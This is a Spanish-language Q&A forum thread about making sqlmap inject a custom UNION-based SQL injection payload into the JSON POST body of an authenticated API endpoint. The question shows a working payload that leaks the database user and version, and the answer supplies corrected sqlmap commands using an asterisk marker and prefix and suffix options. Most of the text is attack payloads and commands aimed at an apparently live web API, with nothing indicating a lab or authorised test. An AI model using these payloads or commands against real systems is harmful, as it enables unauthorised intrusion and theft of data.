¿Cómo usar la inyección personalizada en sqlmap?

0

Esto es información de publicación, normalmente se ve así

{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}

Debajo del resultado "Tienes un error ..."

{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}

A continuación, imprima con éxito la versión de db y la versión de usuario

{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}

Lo que he hecho hasta ahora es

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3

Pero Sqlmap aún falló, ¿dónde estoy haciendo mal?

Gracias de antemano.

    
pregunta Dark Cyber 27.08.2018 - 06:42
fuente

1 respuesta

1

Puedes probar algunos de los siguientes:

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00*","start_date":"2018-8-26","success":1}' --sql-query="') union select 1,user(),version();--+" -v 3

Al usar el astersisco, puedes indicar a sqlmap dónde se debe inyectar.

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --prefix="')" --suffix=";--+" -v 3

Puede usar el prefijo y el sufijo (así como combinarlos con el asterisco) para indicar con precisión a sqlmap dónde colocar qué intento de inyección. Tal vez eso resuelva tu problema ya. También puede echar un vistazo de cerca aquí .

    
respondido por el Ben 27.08.2018 - 07:23
fuente

Lea otras preguntas en las etiquetas